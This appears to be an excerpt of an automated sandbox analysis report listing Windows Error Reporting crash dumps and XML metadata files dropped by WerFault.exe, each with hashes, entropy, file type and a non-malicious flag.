                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2ACC.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.456695882315008
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjB8fm8M4JblMFj+q8vclCr8MjTzd:uITfh/zgrsqYKJpiKoCr8MXzd
                                                      MD5:E083462977CAE3329F38BB072D383D7F
                                                      SHA1:E32718198891FDCE4647C35D9406DA527364A8CC
                                                      SHA-256:E17740EEF7610651F435C91DCDA479574B2CB61D4E5106E45258DF360BF73ECE
                                                      SHA-512:AC3BCCE2ABE87A8936EA55197A51529DCA752E856FA2AEA3108003B53A5406B99DAA272C6FFBEEA7C1D5261914DC88E778C7158E1274AEBC03DF051764EE6DBF
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER70B1.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:32 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):50922
                                                      Entropy (8bit):2.2720533470558357
                                                      Encrypted:false
                                                      SSDEEP:192:VRMNjxGyBCRvQQtOPocbIO6INLc2M7gGntUScAN+axFiG/CBZHPLl4zJBIfiY4+4:QgvQHPThPiRtUSLNT4jHPGzJZsq
                                                      MD5:61A0F85CE06F10187FE81E1E3722C09F
                                                      SHA1:BDA6E5FEC2461BCFA6BF6D58E272FB30EA067743
                                                      SHA-256:A2050B0CADFE8E48D647F052DC29F0E7399882461AEEFD2B8841BFE3F46BEE48
                                                      SHA-512:0E149D8C6874D9E6C0C6689FB0CCACC92E711E58EF7B8EE17ED690E2103DF3F1F6B4419802F4A0409FE806C98DA2F2CB1D5BDC474934BABF3955DF1F82C99DE1
                                                      Malicious:false
                                                      Preview:MDMP....... .......l~;c........................\................*..........T.......8...........T...........(..............(................................................................................U...........B..............GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER72A6.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8372
                                                      Entropy (8bit):3.695359762107911
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CXb6qS6YBSQSUyPGgmf6TS4CpBo89b2ysfrSm:RrlsNiCb6qS6YBVSUTgmf+SX2xff
                                                      MD5:EDCA1CF7264B6E25B96F15C28189254B
                                                      SHA1:F6A0D3CF9219BF8337041BB71734E02601B65E35
                                                      SHA-256:ED72609E9F6CE727AEEC2E593C2C58EF4982708A76CDD85DEE121568E0F5DC37
                                                      SHA-512:8AC362C9E6C526BB4B24A22DB25DC8F1B10201BA0C74D60A8C18ACA634CC669C9ADE5A236E88C45B48F6CA12CD710DECE2D011F9BB72C95FF2013BEA62EC0034
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7334.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.458550279556071
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjTM8fm8M4JblMFXSh+q8vclCr8MjTzd:uITfh/zgrsqYvxJpZhKoCr8MXzd
                                                      MD5:70C6BD3D3F5F1A5800D46FD98C5EF8D9
                                                      SHA1:768B08637D8A8317D38FF35669C8D179837C46B9
                                                      SHA-256:B4B793BFBDF1D5C3FCCA9D0675AA723C1F58A74AB1EA70B50A33957E48054C14
                                                      SHA-512:1773CA25F27CAF8313CE6A5AEB80687495FA345232D134F3BC36F645921226FE0C0FB6C403C719D90CAA2D5F8D9315A7F11EFCAD7F3F73BB8D6D8C3C01196BEE
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER790E.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:35 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):63998
                                                      Entropy (8bit):2.33484711100618
                                                      Encrypted:false
                                                      SSDEEP:192:uEAP/xVcp7udtOPoBBxpziMG0OjI2ib7r0bAwQW1qAzjcAN+8xFiG/kBZHbLnSz/:LP7JPQjdbNp00hWEkLNpOjHb+zGqOKb
                                                      MD5:612D9666FD801BD0D916FEEC94DA1B64
                                                      SHA1:08F79F39C9E09F312B3202646F18C9BCE4E83A8A
                                                      SHA-256:CA385B05F277DB101C2B3195E6D083AC0437B17F27BD4C44FBE5AE69F59038C1
                                                      SHA-512:959C1D9FA247F17DADEEC5A50B436428A3E4F05A3B4A61142712A6A1A986B4E62C3484A51073195E8414DB8D020C3D1CF8B5F4D5C97C4A145E971111E1F82BC0
                                                      Malicious:false
                                                      Preview:MDMP....... .......o~;c........................4...........4...............T.......8...........T...........................0................................................................................U...........B..............GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B03.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8388
                                                      Entropy (8bit):3.697825310691746
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/Cm6LY6YBSnSUZ8Jgmf6TS4CpBHz89bgysfBgm:RrlsNiL6U6YBySUZ8Jgmf+SmgxfT
                                                      MD5:03D4FEC4D29C9C3F4CB6BBA26B9C092C
                                                      SHA1:7BE64D5014504BF94CCCA5F777E8E89F7AE305C1
                                                      SHA-256:8C11A08D49C075607E2AC630973DBFA24222953F7B27E2808343D8BC9BE16CEB
                                                      SHA-512:D5E92C5701569EC3690A69498FB98259E29B038259DB3BC3BA79E6CB0359D891E921FDFF7936534C4A78EEBCB5F15B237848B101047966CFC3AEE0A44F845A7F
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7BA0.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.459046662323008
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjl8fm8M4JblMFR4+q8vclCr8MjTzd:uITfh/zgrsqY+JpO4KoCr8MXzd
                                                      MD5:CE66B48F2FA0E2EC80123315D9E63647
                                                      SHA1:16BBB7B300DDC7AB40E865DA2C580A8D97EC571D
                                                      SHA-256:358BD5588CC43D4B704A3AD1D1A5765DB8AECE40B68EDA66A2281382C9F10DB7
                                                      SHA-512:B828CC49806E619D215C07EF3E86FF15C70FE22C655D4C95EF67DEEBDC34BFE69DA34404CD0D8A251289761E1B9A181437EAF39DB58BC8A326D7AC89803D9A8E
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8245.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:37 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):79772
                                                      Entropy (8bit):2.034889738534872
                                                      Encrypted:false
                                                      SSDEEP:384:g53AVzuNP/aMX79WveBYXRiOUAkLNpOjHbPz4eMIp:8A6PiMX/ZpOHL
                                                      MD5:69D24884698E29C1B07C217DC406B94D
                                                      SHA1:AE455274D15B4363952AB2C58F5B088498AD87C8
                                                      SHA-256:C2B3187135738D10B8C30169A23FD3582C1719993CDCFC448B25D9B0C9FE1776
                                                      SHA-512:4BB0DE62B1FD1373FE62C99CDC559E7A58CF6F3A92BB9E55E26ADDAE334FF087615F1837CF3F410B6AC5BD77BAF4F884EF5157AF096CC055FF6589432D66642B
                                                      Malicious:false
                                                      Preview:MDMP....... .......q~;c........................4...........t....7..........T.......8...........T...........p...,............................................................................................U...........B......D.......GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER84A8.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8388
                                                      Entropy (8bit):3.6978331467436165
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CY6HE6YBSISU1mDgmf6TS4CpB/89bSysfnGm:RrlsNi16k6YBtSU1mDgmf+SiSxfv
                                                      MD5:2909A37000F660E6F35297AF5CB51A3D
                                                      SHA1:7EACD8016D73934A33B797F324E75EBDEED9A492
                                                      SHA-256:D07E71CC065F365647EC07D2C8D2F9C880B42BF83893193761CE0110D768DE7A
                                                      SHA-512:1BAF84F17AA64ED3B99A8AA1BD4C75F029A8296CD056B593A262DE50EAA8506A09FE9B5D670FA143BE4F5F1A89943533B5724CF925BE10CD8F35A743435603B1
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8545.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.456177032053052
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjF+8fm8M4JblMFq+q8vclCr8MjTzd:uITfh/zgrsqY9JpPKoCr8MXzd
                                                      MD5:1241181971C0E7209595F7212BCB895E
                                                      SHA1:A4048560C9E5C7AFED6260F23CEE7ACF9FEC9F2F
                                                      SHA-256:9F5CB209411A8E4A7E837DB074385AFF772FA20FF076E09526D1A2A0175D1823
                                                      SHA-512:5434CF3024C5931C95D52788B6C74D8F55DE70EEE7F600A1BC6CB20484EFA94C9E633B56E05F099BC2F61C10FB19CD08849CA9A73BE0AB4A6F9DF41E23423F6F
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C48.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:40 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):79232
                                                      Entropy (8bit):2.047001762531174
                                                      Encrypted:false
                                                      SSDEEP:384:/oAVzNP/VYdpQ/7YXlROUAkLNpOjHbVzUsWR7OY:gAjPR/QZpOHBWR7
                                                      MD5:5889568BE023C2B7139D34B63094C03E
                                                      SHA1:1B22C65041EAD8B2AABD74C2263348019E7DB2F7
                                                      SHA-256:4356A4D4C5C655691FFF357DA4BF0DE00C054CDE6810848079E6C21E71A99FB5
                                                      SHA-512:FB7075A19AF49C0B626256D1AC6A08D6BD08FB60576CA8E30B6170BE73F91F2CA3D5E4CED1C53CC7D8F821B4282A06F86500D2025F6253BD63A1238445C6B29D
                                                      Malicious:false
                                                      Preview:MDMP....... .......t~;c........................4................7..........T.......8...........T...........p................................................................................................U...........B......D.......GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8E7B.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8390
                                                      Entropy (8bit):3.696365507955807
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CU6h6YBSMSUwZsgmf6TS4CpB489b6ysfiem:RrlsNiB6h6YB5SUwZsgmf+Sn6xfS
                                                      MD5:8533C5AC5D3E2A6F679A630B3662CD90
                                                      SHA1:C948C715817706D4256E3E2675FC4AA5496B7647
                                                      SHA-256:55CE3857ED274E1B02495607872F29F991259FED887A3B9B96ADD1D1BCBF5182
                                                      SHA-512:DD847BDD9579F3120E77CDF7DCD7E3CA226E1FA624A2FBB9579974812B462254A47E3462CB53F8912926645D58B1974370770A70A4D2ED42F9A5FE92387E36C1
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8F09.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.455930032015156
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjw8fm8M4JblMFip+q8vclCr8MjTzd:uITfh/zgrsqYRJpvpKoCr8MXzd
                                                      MD5:B2D79BA2BCA0AE271D72B41D2B5D2FBE
                                                      SHA1:A04E362A7EFA55A5A4F2C364B68C814AF834CAF6
                                                      SHA-256:6A2AEEE43C75328C413F85C505D4D2D4F4EB51D1DA036EFA2ED2A49A8C47BCC7
                                                      SHA-512:2D1C9912F69166BE1701D7A257E54307B39D7261CB4A302CF9DD3D33B6C0FBEF7DA77031350BF88A4F5D90E040F64F896A5E526657865C45D28C93406462CB9D
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER957F.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:43 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):79244
                                                      Entropy (8bit):2.0831035534929656
                                                      Encrypted:false
                                                      SSDEEP:384:sJ9AVzihPHGUgmYXcYO6f69K+aAkLNpOjHbyHzkH08nP1:sfAghPmUgv9dZpOHyEb1
                                                      MD5:7D03634D16CD0A056B0289167A5080C5
                                                      SHA1:45A6C0D3AF04BAC072E7157223859EA170A0A7FD
                                                      SHA-256:FFEA123BBB69383F4DBDE9DC50F45736F074413EC5D9EA47BA899DFAFB27010E
                                                      SHA-512:8422A1767A7BD94DC15FB9041998BBFFCC8232AF3F6BCE937AA9CBF69014C9BAD6C8450687FA928E27132B14862DAF004CDB07BE8DAE30FD7424C37C9A028276
                                                      Malicious:false
                                                      Preview:MDMP....... .......w~;c........................4...........t....7..........T.......8...........T............................................................................................................U...........B......D.......GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7F.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8390
                                                      Entropy (8bit):3.69655114069675
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CX6D6YBSLSUg/ygmf6TS4CpB789beysf46Wqm:RrlsNiC6D6YBeSU1gmf+S+exf46y
                                                      MD5:1B909C937B151BD3842E8B0600B9D6C1
                                                      SHA1:AB600C9CD2861ADEE504C70E2EF3EFC7AE7741A6
                                                      SHA-256:22FDB7BC86C31FB7E034CE84C92C17081D9AB918BFA74C8EAC75FF062A3FC9E5
                                                      SHA-512:5F8C4DB3624EA1190342A17360DBDD786EE68D7E9DE698AA5548AD726CB6F859772113472598706452304C871834B1AC29144F137E591E0DB24C18FB7A45970D
                                                      Malicious:false
